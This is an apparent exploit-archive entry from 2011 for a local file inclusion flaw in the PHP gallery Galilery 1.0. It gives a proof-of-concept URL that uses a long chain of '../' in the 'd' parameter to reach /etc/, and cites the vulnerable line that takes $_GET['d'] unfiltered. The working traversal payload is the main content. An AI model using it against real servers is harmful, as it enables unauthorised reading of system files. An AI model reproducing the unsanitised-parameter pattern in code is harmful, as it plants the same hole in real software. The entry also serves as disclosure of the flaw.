Galilery 1.0 Local File Inclusion Vulnerability

2011-02-22T00:00:00
ID 1337DAY-ID-15437
Type zdt
Reporter lemlajt
Modified 2011-02-22T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # exploit title: local file include in Galilery 1.0
# date: 18.o2.2o11
# author: lemlajt
# software : Galilery
# version: 1.0
# tested on: linux
# cve :
# http://ftp.heanet.ie/disk1/sourceforge/g/project/ga/galilery/Galilery/
 
 
PoC :
 
http://localhost/www/cmsadmins/Galilery-1.0/index.php?pg=1&d=../../../../../../../../../../../../etc/
 
cuz:
index.php: $d=$_GET['d'];



#  0day.today [2018-01-02]  #